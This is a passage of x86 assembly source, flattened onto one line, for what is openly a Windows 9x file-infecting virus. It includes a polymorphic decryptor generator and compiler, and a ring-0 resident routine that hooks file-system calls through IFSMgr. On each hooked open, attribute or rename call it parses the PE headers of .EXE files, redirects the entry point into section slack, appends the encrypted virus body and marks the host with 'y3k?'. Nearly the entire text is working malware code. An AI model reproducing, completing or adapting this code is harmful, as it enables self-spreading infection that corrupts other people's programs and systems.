DeleteFromInfo Label34: popad call IsOperandUndefined jz ChangeOutput call GetTable mov ecx,[FromOperand+ebp] mov edx,[FromTypeOfValue+ebp] xor ebx,ebx test edx,edx jz ValueIsProperlyEmulated_DontNeedThisHack add ebx,[eax] ValueIsProperlyEmulated_DontNeedThisHack: add ebx,[eax+4] add ebx,[eax+8] add ebx,[eax+12] test ebx,ebx jnz MakeUndefined YesChangeIt: mov ebx,[EmulateInstruction+ebp] mov ebx,[ebx] add ebx,ebp call ebx ChangeOutput: call GetEqualValue shr ebx,2 call Output ret MakeUndefined: mov ebx,Undefined or [eax+InfoPtr],ebx jmp ChangeOutput FoundEquals dd 0 ReadFromType dd 0 GetEqualValue: xor ebx,ebx ; register table mov [FoundEquals+ebp],ebx mov [ReadFromType+ebp],ebx mov ecx,Registers call CompareOperands mov ecx,[ToType+ebp] cmp ecx,4 jae DontTryMemory mov ecx,MemorySize mov [ReadFromType+ebp],4 call CompareOperands DontTryMemory: push [FromOperand+ebp] push [FromTypeOfValue+ebp] mov eax,[FoundEquals+ebp] inc eax mov ecx,eax call Random imul eax,eax,8 mov ebx,[esp+eax] mov eax,[esp+eax+4] ; eax = Operand imul ecx,ecx,8 add esp,ecx test ebx,ebx jz Return ; mov ecx,Writeable call DeleteFromInfo ; delete writeable from mem ; might still create bugs!!! ; will be fixed in the future ; (the odds a bug will happen ; is extremly low) ret CompareOperands: pop [ReturnAddress+ebp] inc ecx CmpLoop: dec ecx jnz Label30 jmp [ReturnAddress+ebp] Label30: mov eax,ecx mov ebx,[ReadFromType+ebp] call ReadOperand cmp eax,[FromOperand+ebp] jnz CmpLoop cmp ebx,[FromTypeOfValue+ebp] jnz CmpLoop cmp ecx,[ToOperand+ebp] jz CmpLoop push ecx ; Operand mov ebx,[ReadFromType+ebp] ; Type add ebx,4 push ebx inc [FoundEquals+ebp] jmp CmpLoop UndefineDependentOperands: call IsOperandUndefined jnz Return pushad xor ebx,ebx mov ecx,Registers call Undefine mov ebx,4 mov ecx,MemorySize call Undefine popad ret Undefine: inc ecx mov edx,ebx UndefineLoop: dec ecx jz Return mov eax,ecx mov ebx,edx cmp eax,[ToOperand+ebp] jz UndefineLoop call ReadOperand sub ebx,4 cmp ebx,[ToType+ebp] jnz UndefineLoop cmp eax,[ToOperand+ebp] jnz UndefineLoop push ecx mov eax,ecx mov ebx,edx mov ecx,Undefined call SetInfo pop ecx jmp UndefineLoop ; ----------------------------------------------- ; -------------------------- High level functions ; ----------------------------------------------- RandomOperand: mov eax,3+EndValueFrecuency shr ebx,2 ; ebx = 0 or 1 sub eax,ebx ; eax = 3 or 2 call Random xor ebx,ebx test eax,eax jz Random ; eax = 1 or 2 dec eax jz GetReadableReg sub eax,EndValueFrecuency+1 jz GetReadable mov eax,[EndValue+ebp] mov ebx,[EndTypeOfValue+ebp] and ebx,111b ret GetWriteableReg: call GetWriteableLabel1 test ebx,ebx jnz GetWriteableReg ret ; Returns a writeable operand GetWriteable: mov eax,3 ; create more reg then call Random ; mem test eax,eax jnz GetWriteableReg GetWriteableLabel1: call GetReadable mov ecx,Writeable sub ebx,4 call TestInfo jnz GetWriteableLabel1 ret GetReadableReg: call GetReadable cmp ebx,4 jnz GetReadableReg ret ; Returns a operand GetReadable: mov ebx,4 mov eax,Registers+MemorySize call Random inc eax cmp eax,Registers+1 jl Return shl ebx,1 sub eax,Registers+1 ret ; input ; eax = register or number ; ebx = number or register and value or mem ; ebx = 0 = number ; ebx = 1 = register ; ebx = 2 = [number] ; ebx = 3 = [register] ; ------------------------------------------ ; ---------------------- Low level functions ; ------------------------------------------ Random: push ebx push ecx push edx mov ebx,eax add eax,[RandomNumber+ebp] mov cl,al rol eax,cl add eax,14 xor ecx,46 ror eax,cl add eax,ecx xor [RandomNumber+ebp],eax test ebx,ebx jz NoMod xor edx,edx div ebx xchg eax,edx NoMod: pop edx pop ecx pop ebx ret ; input ; edx = opcode OutputOnlyOpcode: add edi,16 and edi,0fffffff0h bswap edx mov [edi],edx add edi,4 ret OutputOpcode: call OutputOnlyOpcode jmp OutputNotComma Output: mov byte ptr [edi],',' inc edi OutputNotComma: push ecx xor ecx,ecx cmp ebx,1 setbe cl lea ecx,[ecx*8+ecx] push ecx test ecx,ecx jnz Label10 mov byte ptr [edi],'[' inc edi Label10: test ebx,1 setnz cl shl ecx,2 add ecx,'N' mov byte ptr [edi],cl inc edi cmp ecx,'N' jz OutputNumber add eax,'0' stosb sub eax,'0' Label11: pop ecx test ecx,ecx jnz Label12 mov byte ptr [edi],']' inc edi Label12: pop ecx ret OutputNumber: pop ecx push ecx test ecx,ecx setnz cl push eax mov eax,'S' mov byte ptr [edi+ecx-1],al ; variable pop eax stosd jmp Label11 GetTable: cmp ebx,8 stc jz Return dec eax imul eax,eax,20 ; TableSize add eax,[Tables+ebx+ebp] clc ret SetInfo: push eax call GetTable jc ReturnPopEax or [eax+InfoPtr],ecx ; Set attribute pop eax ret DeleteFromInfo: push eax call GetTable jc ReturnPopEax or [eax+InfoPtr],ecx ; Set attribute xor [eax+InfoPtr],ecx ; Clear it pop eax ret ChangeInfo: push eax call GetTable jc ReturnPopEax mov [eax+InfoPtr],ecx pop eax ret IsOperandUndefined: push ecx mov ecx,Undefined call TestInfo pop ecx jz Return jc SetZeroFlag ret SetZeroFlag: cmp eax,eax ret TestInfo: push eax call GetTable jc ReturnPopEax test [eax+InfoPtr],ecx mov ecx,0 setnz cl lahf shl cl,6 btr ax,6+8 or ah,cl sahf pop eax clc ret ; eax = The operand ; ebx ; Which table to read from ReadOperand: call IsOperandUndefined jz OperandIsUndefined call GetTable push ecx xor ebx,ebx mov ecx,16 FindValueLoop: sub ecx,4 jecxz Label32 cmp [eax+ecx],ebx jz FindValueLoop Label32: mov ebx,ecx mov eax,[eax+ecx] pop ecx ret OperandIsUndefined: add ebx,4 ret ReturnPopEax: pop eax ret GetWhereFrom: lea ebx,[FromWhere+ebp-4] jmp GodDamnedLabelDammit GetWhereTo: lea ebx,[EndWhere+ebp-4] GodDamnedLabelDammit: push ebx xor eax,eax dec eax GodDamnedLoopDammit: add ebx,4 cmp eax,[ebx] jz GodDamnedLoopDammit mov eax,[ebx] sub ebx,[esp] sub ebx,4 add esp,4 ret OutputPrefix: push eax xor eax,eax cmp eax,[Prefix+ebp] jz OutputPrefixEnd add edi,16 and edi,0fffffff0h mov eax,Op_db bswap eax stosd xor eax,eax inc eax stosb xor eax,eax xchg eax,[Prefix+ebp] stosb OutputPrefixEnd: pop eax ret Optimize: call ClearDoNothingInstrucions ; call ClearUnnessesaryInstructions xchg esi,edi ret MaybeUnnessesaryInstructions: dd Op_mov, Op_add, Op_sub, Op_and, Op_or, Op_xor MaybeUnnessesaryInstructionsEnd: ClearUnnessesaryInstructions: push edi sub esi,16 ClearUnnessesaryInstructionsLoop: push edi add esi,16 and esi,0fffffff0h lodsd bswap eax lea edi,[MaybeUnnessesaryInstructions+ebp] mov ecx,(MaybeUnnessesaryInstructionsEnd-MaybeUnnessesaryInstructions)/4 repnz scasd test ecx,ecx jz DontOptimize2 xor eax,eax .while (al!=',') lodsb .endw mov edi,esi mov ecx,1000h FindNextEntry: ; rep scasb jecxz DontOptimize2 mov ebx,edi and edi,0fffffff0h sub ebx,edi cmp ebx,4 jz DontOptimize2 mov ebx,Op_mov cmp [edi],ebx jnz FindNextEntry pop edi jmp ClearUnnessesaryInstructionsLoop DontOptimize2: pop edi and esi,0fffffff0h mov ecx,16 rep movsb sub esi,16 jmp ClearUnnessesaryInstructionsLoop pop edi ret ClearDoNothingInstrucions: push edi sub esi,16 xor ecx,ecx OptimizeLoop: add esi,16 and esi,0fffffff0h push esi lodsd test eax,eax jz OptimizeEnd bswap eax cmp eax,Op_mov jnz DontOptimize xor eax,eax lodsw mov ebx,eax lodsb lodsw cmp ebx,eax jnz DontOptimize pop esi jmp OptimizeLoop DontOptimize: mov ecx,16 pop esi rep movsb sub esi,16 jmp OptimizeLoop OptimizeEnd: test ecx,ecx jnz OptimizeDoReallyQuit mov ecx,16 pop esi rep movsb sub esi,16 inc ecx jmp OptimizeLoop OptimizeDoReallyQuit: pop eax pop edi ret ; 1. Init block ; offset 0 ; pushad ; 2. Make pointer to mem ; 3. Read block ; Encrypt block ; Write block ; popad ; 5. Change mempointer block ; 6. Compare and jump block PE_Objects equ 6 PE_NTHdrSize equ 20 PE_Entrypoint equ 40 PE_ImageBase equ 52 PE_ObjectAlign equ 56 PE_FileAlign equ 60 PE_ImageSize equ 80 Obj_Name equ 0 Obj_VirtualSize equ 8 Obj_VirtualOffset equ 12 Obj_PhysicalSize equ 16 Obj_PhysicalOffset equ 20 Obj_Flags equ 36 IFSMgr equ 0040h R0_AllocMem equ 000dh R0_FreeMem equ 000eh Ring0_FileIO equ 0032h InstallFileSystemAPIhook equ 0067h UniToBCSPath equ 0041h ResidentcodeStart: jmp FileFunction R0_OPENCREATFILE equ 0D500h ; Open/Create a file R0_READFILE equ 0D600h ; Read a file, no context R0_WRITEFILE equ 0D601h ; Write to a file, no context R0_CLOSEFILE equ 0D700h IFSFN_FILEATTRIB equ 33 IFSFN_OPEN equ 36 IFSFN_RENAME equ 37 IFSFN_READ equ 0 ; read a file IFSFN_WRITE equ 1 ; write a file FileIOWrite: mov eax,R0_WRITEFILE mov ebx,[FileHandle+edi] pop [ReturnAddr+edi] push Ring0_FileIO jmp Label6 FileIOReadDWordToSlack: mov ecx,4 ; how many bytes FileIOReadToSlack: lea esi,[Slack+edi] ; where to place data FileIORead: mov eax,R0_READFILE FileIOHandle: mov ebx,[FileHandle+edi] FileIO: pop [ReturnAddr+edi] push Ring0_FileIO jmp Label6 vxd: pop [ReturnAddr+edi] Label6: pop [CallService+edi+2] mov word ptr [CallService+edi],20cdh mov word ptr [CallService+edi+4],0040h jmp CallService CallService: Slack: int 20h dw 0dh dw 0040h jmp [ReturnAddr+edi] ZeroRegStart: db 0 FileToInfect db 256 dup (0) TempPtr dd 0 TotalSize dd 0 OldAPIFunction dd 0 GuidePos dd 0 GuideSize dd 0 DecryptorPos dd 0 DecryptorSize dd 0 HeaderSize dd 0 VirusInRing0Mem dd 0 MemoryTable dd 0 VirtualDataSegment dd 0 ReturnAddr dd 0 ReturnAddr2 dd 0 Flag dd 0 FileHandle dd 0 PEHeadOfs dd 0 PEHeadStart dd 0 ObjTable dd 0 CodeObjectPtr dd 0 DataObjectPtr dd 0 LastObjectPtr dd 0 SlackInCodeSegment dd 0 SlackInDataSegment dd 0 OldRVA dd 0 StackSave dd 0 NewVirusOffset dd 0 JumpTableMoveOffset dd 0 NewGuideOffset dd 0 NewDecryptorOffset dd 0 NewDataSegmentOffset dd 0 Unload dd 0 ZeroRegEnd: ; eax = how much free space ; ebx = where it is located ; ecx = pointer to segment object table ; edx = last object pointer GetSegmentSlack: pop [ReturnAddr2+edi] mov eax,[PEHeadStart+edi] lea ebx,[eax+24] xor ecx,ecx mov cx,[eax+PE_NTHdrSize] ; NT hdr size add ebx,ecx ; ebx -> object table mov cx,[eax+PE_Objects] ; # objects imul ecx,ecx,40 add ecx,ebx push ecx ; push pointer to last object ; + 40 FindCodeSegmentLoop: sub ecx,8*5 cmp ecx,ebx jl DidntFindSegment cmp dword ptr [ecx],edx ; is code object? jnz FindCodeSegmentLoop pop edx ; pop pointer to last object sub edx,40 mov eax,[ecx+Obj_PhysicalSize] ; size of segment mov ebx,[ecx+Obj_PhysicalOffset] ; where does segment start call CalculateFreeSpace jmp [ReturnAddr2+edi] DidntFindSegment: pop eax xor eax,eax jmp [ReturnAddr2+edi] SegmentSize dd 0 SegmentOffset dd 0 SegmentBuffer dd 0 CalculateFreeSpace: push ecx push edx mov [SegmentSize+edi],eax mov [SegmentOffset+edi],ebx push eax push R0_AllocMem call vxd pop ecx test eax,eax jz FileFunctionEndAddEsp mov [SegmentBuffer+edi],eax mov edx,[SegmentOffset+edi] ; read from mov esi,eax ; read to mov ecx,[SegmentSize+edi] ; how much to read call FileIORead mov ebx,edi mov edi,[SegmentBuffer+ebx] add edi,[SegmentSize+ebx] sub edi,4 ; edi -> end of segment push edi ; push end of seg xor eax,eax xor ecx,ecx dec ecx std repz scasb cld dec eax sub eax,ecx mov edi,ebx pop ebx ; end of seg sub ebx,8 ; decrease some push eax ; push number of slack bytes mov eax,[SegmentBuffer+edi] sub ebx,eax push eax push R0_FreeMem call vxd pop eax pop eax ; eax = slackbytes in codeseg sub eax,20 ; some safety sub ebx,eax ; where slack starts pop edx pop ecx ret ; ---------------------------------------- ; --------------------------- FileFunction ; ---------------------------------------- FileFunction: push ebp mov ebp,esp push edi push esi push ebx BasePtr: mov edi,66666666h cmp [Unload+edi],1 jz CallInOurFunction xor eax,eax inc eax cmp [Flag+edi],eax jz CallInOurFunction mov [Flag+edi],eax mov eax,[ebp+12] cmp eax,IFSFN_OPEN jz CheckFilename cmp eax,IFSFN_FILEATTRIB jz CheckFilename cmp eax,IFSFN_RENAME jnz FileFunctionEnd CheckFilename: mov eax,[ebp+16] test eax,eax jz FileFunctionEnd cmp eax,0ffh jz FileFunctionEnd cmp eax,25 ja FileFunctionEnd add eax,'a'-1 add eax,':'*256 lea esi,[FileToInfect+edi] mov word ptr [esi],ax add esi,2 push 0 push 250 mov eax,[ebp+28] mov eax,[eax+12] add eax,4 push eax push esi push UniToBCSPath call vxd add esp,16 mov byte ptr [esi+eax],0 cmp dword ptr [esi+eax-4],'EXE.' jne FileFunctionEnd xor ebx,ebx cmp dword ptr [esi+1],'OLNU' ; is catalog starting on unlo setz bl mov [Unload+edi],ebx ; unload virus then cmp dword ptr [esi],'FNI\' ; dont infect files in \win* jne FileFunctionEnd ; if there is a bug we dont ; to hurt system critical ; files sub esi,2 mov bx,2 mov cx,0 mov dx,1h mov eax,R0_OPENCREATFILE call FileIO jc FileFunctionEnd mov [FileHandle+edi],eax xor edx,edx ; where to read in file call FileIOReadDWordToSlack jc FileFunctionEndCloseFile cmp word ptr [Slack+edi],'ZM' jnz FileFunctionEnd mov edx,3ch ; where to read in file call FileIOReadDWordToSlack mov edx,[Slack+edi] mov [PEHeadOfs+edi],edx call FileIOReadDWordToSlack cmp word ptr [Slack+edi],'EP' jnz FileFunctionEndCloseFile mov edx,[PEHeadOfs+edi] add edx,84 call FileIOReadDWordToSlack mov ecx,[Slack+edi] ; size of exehead, pehead and ; objtable mov edx,[PEHeadOfs+edi] sub ecx,edx ; size of pehead and objtable cmp ecx,1000h ja FileFunctionEndCloseFile mov [HeaderSize+edi],ecx lea eax,[ecx+20] ; allocate mem for PEHeader push eax push R0_AllocMem call vxd pop ecx test eax,eax jz FileFunctionEndCloseFile mov ecx,[HeaderSize+edi] mov edx,[PEHeadOfs+edi] mov esi,eax mov [PEHeadStart+edi],esi call FileIORead mov eax,[PEHeadStart+edi] cmp word ptr [eax],'EP' jnz FileFunctionEndAddEsp mov ebx,'y3k?' ; already infected cmp [eax+12],ebx jz FileFunctionEndAddEsp mov edx,'xet.' call GetSegmentSlack ; eax = how much free space ; ebx = where it is located ; ecx = pointer to segment object table ; edx = pointer to last object table cmp eax,[GuideSize+edi] jl FileFunctionEndAddEsp mov [CodeObjectPtr+edi],ecx ; save offset of code object mov [SlackInCodeSegment+edi],ebx mov edx,'tad.' call GetSegmentSlack test eax,eax jz FileFunctionEndAddEsp mov [DataObjectPtr+edi],ecx ; save offset of data object push eax push ebx .if (ecx==edx) mov ebx,[PEHeadStart+edi] mov eax,[ebx+PE_FileAlign+8] ; file align .else mov eax,[ecx+Obj_PhysicalSize] ; physical size .endif mov ebx,[ecx+Obj_VirtualSize] ; - virtual size sub eax,ebx ; = free space mov [SlackInDataSegment+edi],ebx cmp eax,MemorySize*4 ; if this is true we can be jg InfectFile ; 'sure' no bug will occure. add eax,ebx ; size of .data segment on ; disk sub eax,MemorySize*4+10 ; some safety pop ebx ; where in file the zero add ebx,200h ; slack starts sub eax,ebx pop eax ; size of slack block jc FileFunctionEndAddEsp sub eax,250h+MemorySize*4 ; enough mem free jc FileFunctionEndAddEsp ; this method is more risky ; will bug out if the ; infected program relies ; on the data to be cleared sub esp,8 mov [SlackInDataSegment+edi],ebx InfectFile: add esp,8 mov [LastObjectPtr+edi],edx ; ptr to last object table mov ecx,[PEHeadStart+edi] mov edx,[ecx+PE_Entrypoint] ; save old RVA mov [OldRVA+edi],edx mov ecx,[CodeObjectPtr+edi] mov ebx,[SlackInCodeSegment+edi] BreakPoint: mov eax,ebx ; ebx = how far in is free ; space add ebx,[ecx+Obj_VirtualOffset] ; ebx = free space in mem mov edx,[PEHeadStart+edi] mov [edx+PE_Entrypoint],ebx ; save new RVA add eax,[ecx+Obj_PhysicalOffset] ; eax = free space in file mov [NewGuideOffset+edi],eax mov ecx,[DataObjectPtr+edi] mov eax,[ecx+Obj_VirtualOffset] ; data space in mem add eax,[SlackInDataSegment+edi] ; free data space in mem add eax,(MemorySize-1)*4 add eax,[edx+PE_ImageBase] ; add with image base mov ecx,MemorySize mov ebx,[MemoryTable+edi] mov edx,0ch mov [ebx+ecx*4],edx ; used in fs:[0c] sub ebx,4 CopyPointersToMem: mov [ebx+ecx*4],eax sub eax,4 dec ecx jnz CopyPointersToMem add ebx,4 mov [PointerToDataSlack+edi],ebx mov ebx,[LastObjectPtr+edi] mov eax,[VirtualDataSegment+edi] mov ecx,[ebx+Obj_VirtualOffset] ; virtual offset add ecx,[ebx+Obj_PhysicalSize] ; physical size mov edx,[PEHeadStart+edi] add ecx,[edx+PE_ImageBase] ; add with imagebase mov [eax+8],ecx ; Decryptor Entrypoint mov edx,[OldRVA+edi] mov ebx,[PEHeadStart+edi] add edx,[ebx+PE_ImageBase] ; add with image base mov [eax],edx ; Program entrypoint mov ebx,[DataObjectPtr+edi] mov ecx,[ebx+Obj_VirtualOffset] ; Virtual offset add ecx,[SlackInDataSegment+edi] ; Virtual offset of data slack mov edx,[PEHeadStart+edi] add ecx,[edx+PE_ImageBase] ; add with image base mov [eax+4],ecx mov ecx,[ebx+Obj_PhysicalOffset] add ecx,[SlackInDataSegment+edi] ; Physical offset of data slack mov [NewDataSegmentOffset+edi],ecx mov ebx,[LastObjectPtr+edi] mov ecx,[ebx+Obj_PhysicalSize] ; physical size add ecx,[ebx+Obj_PhysicalOffset] ; physical offset mov [NewDecryptorOffset+edi],ecx ; Entrypoint in file mov edx,[eax+8] ; decryptor start add edx,[DecryptorSize+edi] mov [eax+12],edx ; save where to start decrypt ; write Guide pushad mov esi,[GuidePos+edi] mov eax,[GuideSize+edi] add eax,100 ; allocate mem for PEHeader push eax push R0_AllocMem call vxd pop ecx test eax,eax jz FileFunctionEndCloseFile mov [TempPtr+edi],eax push edi mov ebp,edi mov edi,eax call Compile pop edi mov edx,[NewGuideOffset+edi] ; write to mov ecx,[GuideSize+edi] ; write ecx bytes call FileIOWrite mov eax,[TempPtr+edi] push eax push R0_FreeMem call vxd pop eax mov esi,[DecryptorPos+edi] mov eax,[DecryptorSize+edi] add eax,100 ; allocate mem for PEHeader push eax push R0_AllocMem call vxd pop ecx test eax,eax jz FileFunctionEndCloseFile mov [TempPtr+edi],eax push edi mov ebp,edi mov edi,eax call Compile pop edi ; write Decryptor mov edx,[NewDecryptorOffset+edi] mov ecx,[DecryptorSize+edi] call FileIOWrite mov eax,[TempPtr+edi] push eax push R0_FreeMem call vxd pop eax popad mov edx,[NewDataSegmentOffset+edi] mov ecx,MemorySize*4 mov esi,[VirtualDataSegment+edi] call FileIOWrite mov edx,[NewDecryptorOffset+edi] add edx,[DecryptorSize+edi] mov ecx,VSize mov esi,[VirusInRing0Mem+edi] call FileIOWrite mov ebx,VSize add ebx,[DecryptorSize+edi] mov esi,[LastObjectPtr+edi] mov eax,[esi+Obj_PhysicalSize] ; physical size add eax,ebx ; add with new virussize add eax,100 ; safety mov edx,[PEHeadStart+edi] mov ecx,[edx+PE_ObjectAlign] ; object align xor edx,edx div ecx inc eax xor edx,edx mul ecx .if eax>[esi+8] mov [esi+Obj_VirtualSize],eax ; save new virtual size .endif mov eax,[esi+Obj_PhysicalSize] ; physical size add eax,ebx ; add with virus size add eax,20 ; safety mov edx,[PEHeadStart+edi] mov ecx,[edx+PE_FileAlign] ; file align xor edx,edx div ecx inc eax xor edx,edx mul ecx mov [esi+Obj_PhysicalSize],eax ; save new physical size mov eax,'y3k?' mov ecx,[PEHeadStart+edi] mov [ecx+12],eax mov eax,[LastObjectPtr+edi] mov esi,0c0000040h mov [eax+Obj_Flags],esi mov eax,[ecx+PE_ImageSize] ; size of image add eax,VirusSize ; add with virussize mov ecx,[ecx+PE_ObjectAlign] ; object aligment xor edx,edx div ecx inc eax xor edx,edx mul ecx ; new size of image in eax mov esi,[PEHeadStart+edi] mov [esi+PE_ImageSize],eax ; save it mov edx,[PEHeadOfs+edi] ; write to mov ecx,[HeaderSize+edi] call FileIOWrite FileFunctionEndAddEsp: mov eax,[PEHeadStart+edi] push eax push R0_FreeMem call vxd pop eax FileFunctionEndCloseFile: mov eax,R0_CLOSEFILE call FileIOHandle FileFunctionEnd: xor eax,eax mov [edi+Flag], eax CallInOurFunction: mov eax,[edi+OldAPIFunction] mov ecx,edi pop ebx pop esi pop edi pop ebp pop [ReturnFromHook+ecx] lea edx,[ReturnFromHook+ecx+4] sub [ReturnFromHook+ecx],edx call dword ptr [eax] db 0e9h ReturnFromHook: dd 0 ; ------------------------------ ; --------------------- Compiler ; ------------------------------ PointerToRandomMemory equ MemorySize PointerToDataSlack dd 0 SavedOffsets dd 10 dup (-1) InstructionTable: dd Op_add dd Op_and dd Op_cmp dd Op_or dd Op_sub dd Op_xor dd Op_mov dd Op_jmp dd Op_jnz dd Op_jnb dd Op_jna dd Op_offset dd Op_db InstructionTableEnd: InstructionTables: AddTable: dd DefaultProc1 db 00000000b db 10000000b db 00000100b db 000b AndTable: dd DefaultProc1 db 00100000b db 10000000b db 00100100b db 100b CmpTable: dd DefaultProc1 db 00111000b db 10000000b db 00111100b db 111b OrTable: dd DefaultProc1 db 00001000b db 10000000b db 00001100b db 001b SubTable: dd DefaultProc1 db 00101000b db 10000000b db 00101100b db 101b XorTable: dd DefaultProc1 db 00110000b db 10000000b db 00110100b db 110b MovTable: dd MoveProc db 10001000b db 11000110b db 10111000b db 000b JmpTable: dd JmpProc dd 0 JnzTable: dd JxxProc db 0101b db 0,0,0 JnbTable: dd JxxProc db 0011b db 0,0,0 JnaTable: dd JxxProc db 0110b db 0,0,0 OffsetTable: dd OffsetProc dd 0 DeclareByteTable: dd DeclareByteProc dd 0 ToValue dd 0 ToTypeOfValue dd 0 SecondValue dd 0 SecondTypeOfValue dd 0 Instruction dd 0,0,0 InstructionLength dd 0 RegistersBitValue: dd 0 IntelEax dd 000b IntelEbx dd 011b IntelEcx dd 001b IntelEdx dd 010b IntelEsi dd 110b IntelEdi dd 111b IntelEsp dd 100b ReadInstruction1: push edi lea edi,[InstructionTable+ebp] mov ecx,(InstructionTableEnd-InstructionTable)/4+1 add esi,16 and esi,0fffffff0h lodsd bswap eax push edi repnz scasd sub edi,[esp] shl edi,1 lea ebx,[edi+4-8+InstructionTables+ebp] mov eax,[ebx-4] add eax,ebp pop edi pop edi test ecx,ecx jz CompileEnd jmp eax ReadOperands: call GetOperand mov [ToValue+ebp],eax mov [ToTypeOfValue+ebp],ebx mov al,byte ptr [esi] cmp al,',' jnz Return inc esi call GetOperand mov [SecondValue+ebp],eax mov [SecondTypeOfValue+ebp],ebx ret SetDirectionBit: call WhatOperandIsRegMem setl bl shl ebx,1 or [Instruction+ebp],ebx ret GetOther: call WhatOperandIsRegMem jnl Label40 mov eax,[ToValue+ebp] mov ebx,[ToTypeOfValue+ebp] ret GetRegMem: call WhatOperandIsRegMem jl Label40 mov eax,[ToValue+ebp] mov ebx,[ToTypeOfValue+ebp] ret Label40: mov eax,[SecondValue+ebp] mov ebx,[SecondTypeOfValue+ebp] ret RegMem_Reg equ 0 RegMem_Immediate equ 1 Eax_Immediate equ 2 FetchOpcode: call GetRegMem cmp ebx,4 setz bl cmp eax,1 setz al and eax,ebx mov ecx,eax call GetOther xor eax,eax test ebx,ebx jnz Return inc eax add eax,ecx ret WhatOperandIsRegMem: xor ebx,ebx mov eax,[ToTypeOfValue+ebp] cmp eax,[SecondTypeOfValue+ebp] ret FixAddresses: lea edx,[Instruction+ebp] add edx,[InstructionLength+ebp] call GetRegMem xor ecx,ecx cmp ebx,8 setl cl imul ecx,ecx,3 shl ecx,6 cmp ebx,8 jz MemoryValue mov eax,[eax*4+RegistersBitValue+ebp] or ecx,eax jmp Label43 MemoryValue: or ecx,101b mov [edx+1],eax add [InstructionLength+ebp],4 Label43: inc [InstructionLength+ebp] call GetOther test ebx,ebx jz LastOperandIsImmediate mov eax,[eax*4+RegistersBitValue+ebp] shl eax,3 or ecx,eax mov byte ptr [edx],cl ret LastOperandIsImmediate: push edx lea edx,[Instruction+ebp] add edx,[InstructionLength+ebp] mov [edx],eax add [InstructionLength+ebp],4 pop edx or byte ptr [edx],cl ret OutputInstruction: push esi lea esi,[Instruction+ebp] mov ecx,[InstructionLength+ebp] rep movsb pop esi ret ; input ; Edi -> where to put compiled code ; Esi -> code to compile ; return ; eax = where to put compiled code ; ebx = size of compiled code Compile: push edi sub esi,16 CompileAgain: mov [Instruction+ebp],0 mov [InstructionLength+ebp],0 call ReadInstruction1 mov al,0c3h mov byte ptr [edi],al jmp CompileAgain CompileEnd: pop esi pop esi mov eax,edi sub eax,esi ret OffsetProc: call AsciiToNum mov [SavedOffsets+ebp+eax*4],edi ret DeclareByteProc: xor eax,eax lodsb mov ecx,eax rep movsb ret MoveProc: push ebx call ReadOperands call SetDirectionBit call FetchOpcode test eax,eax jz DefaultProc1Label1 call GetRegMem mov ecx,eax mov eax,1 cmp ebx,8 jz DefaultProc1Label1 mov eax,[ecx*4+RegistersBitValue+ebp] lea edx,[Instruction+ebp] pop ebx or al,byte ptr [ebx+2] mov [edx],eax call GetOther mov [edx+1],eax mov [InstructionLength+ebp],5 jmp OutputInstruction DefaultProc1: push ebx call ReadOperands call SetDirectionBit call FetchOpcode DefaultProc1Label1: pop ebx add ebx,eax movzx ecx,byte ptr [ebx] inc ecx dec eax jnz Label41 mov ch,byte ptr [ebx+2] shl ch,3 Label41: or [Instruction+ebp],ecx inc [InstructionLength+ebp] dec eax jz CopyDataToInstruction call FixAddresses jmp OutputInstruction CopyDataToInstruction: call GetOther lea ebx,[Instruction+ebp] add ebx,[InstructionLength+ebp] mov [ebx],eax add [InstructionLength+ebp],4 jmp OutputInstruction ;-JMP-------Jump ;Near,8-bit |1|1|1|0|1|0|1|1| 8-bit Displacement ;Near,Direct |1|1|1|0|1|0|0|1| Full Displacement ;Near,Indirect |1|1|1|1|1|1|1|1| |mod|1|0|0| R/M | JmpProc: call GetOperand xor ecx,ecx test ebx,ebx jz JumpIsIndirect mov ebx,[eax*4+RegistersBitValue+ebp] mov al,0ffh stosb mov eax,ebx or eax,00100000b stosb ret JumpIsIndirect: mov ebx,[SavedOffsets+ebp+eax] sub ebx,edi add ebx,4 test ebx,0fffffff8h jz OutPutSmallJump ret JxxProc: movzx edx,byte ptr [ebx] push edx call GetOperand pop edx mov ebx,[SavedOffsets+ebp+eax] sub ebx,edi add ebx,4 test ebx,0fffffff8h jz OutPutSmallJump mov al,0fh stosb mov al,10000000b or eax,edx stosb sub ebx,6+4 mov eax,ebx stosd ret OutPutSmallJump: mov al,01110000b or eax,edx stosb mov eax,ebx sub eax,2+4 stosb ret ret GetOperand: xor edx,edx mov al,byte ptr [esi] cmp al,'[' setz dl mov ecx,edx add esi,edx shl edx,3 mov ebx,edx ; ebx = 0 or 8 lodsb cmp al,'S' ; A variable jnz Label53 mov edx,[PointerToDataSlack+ebp] lodsd mov eax,[edx+eax*4] add esi,ecx xor edx,edx ret Label53: cmp al,'R' setz dl shl edx,2 add ebx,edx ; ebx = ebx + (0 or 4) test edx,edx ; is value jz ReadValue xor eax,eax lodsb ; read register cmp al,'X' jz GetRandomReg sub eax,'0' add esi,ecx ret ReadValue: lodsd add esi,ecx ret Return: ret AsciiToNum: xor eax,eax lodsb sub eax,'0' ret ResidentcodeEnd: VirusEnd: _rsrc ends end Main